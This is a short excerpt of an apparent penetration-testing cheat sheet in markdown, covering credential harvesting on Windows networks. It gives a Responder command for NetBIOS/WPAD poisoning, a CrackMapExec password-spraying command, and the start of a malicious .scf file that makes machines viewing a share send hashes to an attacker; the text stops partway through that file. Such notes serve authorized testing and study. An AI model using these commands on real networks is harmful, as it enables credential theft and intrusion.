hackern0v1c3/hackern0v1c3.github.io/netpen.md

 ## Getting Creds
 * `responder -I eth0 -wrf` _Start responder on eth0.
 Listen for netbios, and wpad_
 * `crackmapexec smb {ip} -u {users.txt} -p {password}` _spray all user accounts in users.txt with a single popular password_
+* _Example index.scf file that can force any machine that views a share to send hash to attackers responder_
 ```
 [Shell]
 Command=1